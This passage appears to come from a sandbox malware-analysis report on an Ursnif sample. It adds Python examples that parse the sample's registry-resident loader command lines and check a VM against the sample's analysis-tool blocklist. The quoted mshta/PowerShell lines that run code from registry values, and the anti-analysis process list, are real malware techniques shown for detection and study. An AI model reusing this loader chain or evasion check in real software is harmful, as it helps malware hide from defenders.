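The chain above is a registry-resident loader: mshta runs an inline `about:` HTA that evaluates whatever WScript.Shell.RegRead returns from the `DeviceFile` value, that stage starts PowerShell, which ASCII-decodes the `UtilTool` value under the same key and hands it to Invoke-Expression, and the decoded script compiles an injector with csc.exe. Nothing but the VBS ever touches disk as a script file, so the registry key is what an analyst has to dump. The following is an added example (not the sample's code and not a Joe Sandbox artifact) that pulls the hive, key and value name out of both command lines, flags command lines of this shape, and decodes a REG_BINARY value the way `[System.Text.Encoding]::ASCII.GetString` does. The two command lines are quoted from this report; the hive map, the detection heuristic and the bytes decoded at the end are the author's, and `dump_live()` reads the real value on a Windows host.

```python
"""Locate and decode the registry-resident stages behind the mshta/powershell
command lines. Added example; command lines quoted from the report, the rest
constructed or assumed."""
import re
import sys

MSHTA_CMDLINE = (
    r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';"
    r"resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software"
    r"\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'"
)
POWERSHELL_CMDLINE = (
    r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII"
    r".GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550')"
    r".UtilTool))"
)

# Assumed mapping of the short hive names used in both command lines.
HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE", "HKU": "HKEY_USERS"}


def _location(hive, key, value, consumer):
    return {"hive": HIVES.get(hive.upper(), hive), "key": key.strip("\\"),
            "value": value, "consumer": consumer}


def parse_mshta_regread(cmdline):
    """Registry value read by WScript.Shell.RegRead inside an inline HTA.
    The path sits in a JScript string literal, so runs of backslashes are
    collapsed to one before splitting hive, key and value name."""
    m = re.search(r"regread\('([^']+)'\)", cmdline, re.IGNORECASE)
    if not m:
        return None
    parts = re.sub(r"\\+", r"\\", m.group(1)).split("\\")
    return _location(parts[0], "\\".join(parts[1:-1]), parts[-1], "mshta/RegRead")


def parse_powershell_gp(cmdline):
    """Registry value read by Get-ItemProperty (gp) and fed to Invoke-Expression."""
    m = re.search(r"\bgp\s+'([^']+)'\s*\)\.(\w+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    hive, _, key = m.group(1).partition(":")
    return _location(hive, key, m.group(2), "powershell/Get-ItemProperty")


def is_registry_resident_loader(cmdline):
    """Heuristic (assumption): an inline HTA reading the registry, or PowerShell
    evaluating bytes pulled from a registry value."""
    low = cmdline.lower()
    hta = "mshta" in low and "about:" in low and "regread(" in low
    ps = ("powershell" in low
          and re.search(r"\b(iex|invoke-expression)\b", low) is not None
          and re.search(r"\b(gp|get-itemproperty)\b", low) is not None
          and "getstring(" in low)
    return hta or ps


def decode_stage(reg_binary):
    """Decode a REG_BINARY value exactly as [System.Text.Encoding]::ASCII.GetString
    does: bytes above 0x7F become '?', nothing raises."""
    return "".join(chr(b) if b < 0x80 else "?" for b in reg_binary)


def dump_live(location):
    """Windows only: read the value named in `location` from the live registry."""
    if sys.platform != "win32":
        raise RuntimeError("live registry access requires Windows")
    import winreg
    root = getattr(winreg, location["hive"])
    with winreg.OpenKey(root, location["key"]) as k:
        data, _type = winreg.QueryValueEx(k, location["value"])
    return data


if __name__ == "__main__":
    for line in (MSHTA_CMDLINE, POWERSHELL_CMDLINE):
        print(is_registry_resident_loader(line),
              parse_mshta_regread(line) or parse_powershell_gp(line))
    # Constructed REG_BINARY payload standing in for the real UtilTool value.
    print(decode_stage(b"Write-Host 'constructed stage'\x80"))
```

Both parsers resolve to the same key, which is the one to export (`reg export` or `dump_live()`) before the sample's self-deletion and cleanup run; `is_registry_resident_loader()` is the shape of the command-line condition behind the "Powershell run code from registry" and "MSHTA Spawning Windows Shell" signatures above.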

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01206CD6 cpuid 34_2_01206CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_0120682B HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process, 34_2_0120682B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01205A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 34_2_01205A5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01206CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 34_2_01206CD6

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: regshot.exe
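The memory strings listed here and under "Tries to detect sandboxes and other dynamic analysis tools" above are one blocklist of image names (debuggers, sniffers, Sandboxie service processes, and generic names such as SAMPLE.EXE that sandboxes give the detonated file) which the script compares against running processes. The report shows them with trailing junk bytes, so the first job is recovering clean names. The following is an added example (not the sample's code and not Joe Sandbox tooling) that recovers the list from such raw strings and checks a process snapshot against it, so an analyst can see which tools on the VM need renaming before a re-run. The raw strings are a constructed subset modelled on the lines in this report, the process snapshot is constructed, and the three categories are the author's heuristic.

```python
"""Recover an analysis-tool blocklist from raw memory strings and check a
process snapshot against it. Added example; inputs are constructed."""
import re

# Constructed: raw strings as the sandbox reported them from wscript.exe memory,
# trailing junk bytes included (a subset modelled on the report).
RAW_STRINGS = [
    "Q?$SANDBOXIERPCSS.EXEV5",
    ":FRIDA-WINJECTOR-HELPER-32.EXE",
    "PEID.EXE#Z",
    "PROCMON.EXE",
    "A9$BEHAVIORDUMPER.EXEQ",
    "U.SANDBOXIEDCOMLAUNCH.EXE",
    "IDAG.EXE:V",
    'D"WINDBG.EXE","MMR.EXE","SAMP1E.EXE","WIRESHARK.EXE","MMR.EXE","SAMPLE.EXE","XXX.EXE")',
    "wireshark.exe",
    "ollydbg.exe",
]

# An image name is NAME.EXE; digits, underscores and hyphens are allowed because
# of entries such as FRIDA-WINJECTOR-HELPER-32.EXE. Surrounding junk is dropped.
_IMAGE = re.compile(r"([A-Z0-9_\-]{2,}\.EXE)", re.IGNORECASE)


def recover_blocklist(strings):
    """Upper-cased, de-duplicated set of image names found in the raw strings
    (the sample lists MMR.EXE twice; the set collapses that)."""
    names = set()
    for s in strings:
        for m in _IMAGE.findall(s):
            names.add(m.upper())
    return names


def categorise(name):
    """Assumed categorisation, not from the sample: Sandboxie service names,
    generic names sandboxes give the detonated file, or an analysis tool."""
    if name.startswith("SANDBOXIE"):
        return "sandbox_artifact"
    if name in {"SAMPLE.EXE", "SAMP1E.EXE", "RUNSAMPLE.EXE", "XXX.EXE"}:
        return "generic_sample_name"
    return "analysis_tool"


def tripped(blocklist, running):
    """Processes in `running` the check would match. The comparison is on the
    image name only and case-insensitive, so a renamed tool is not matched."""
    hits = []
    for path in running:
        image = path.replace("/", "\\").rsplit("\\", 1)[-1].upper()
        if image in blocklist:
            hits.append(path)
    return hits


if __name__ == "__main__":
    blocklist = recover_blocklist(RAW_STRINGS)
    for name in sorted(blocklist):
        print(f"{categorise(name):20} {name}")
    # Constructed snapshot of an analyst VM: one renamed tool, one left as shipped.
    snapshot = [r"C:\Tools\pm.exe", r"C:\Program Files\Wireshark\Wireshark.exe",
                r"C:\Windows\System32\svchost.exe"]
    for path in tripped(blocklist, snapshot):
        print("would be detected:", path)
```

On a real VM, feed `tripped()` the output of `Get-Process | Select-Object -ExpandProperty Path` (or the equivalent from your sandbox agent); every hit is a tool to rename or stop before detonation. Because the match is on the exact image name, renaming `procmon.exe` to `pm.exe` is enough against this check, though not against checks on window titles or driver names, which this list does not cover.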

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: the same memory dumps, rundll32.exe process memory space and unpacked PE regions listed under Stealing of Sensitive Information above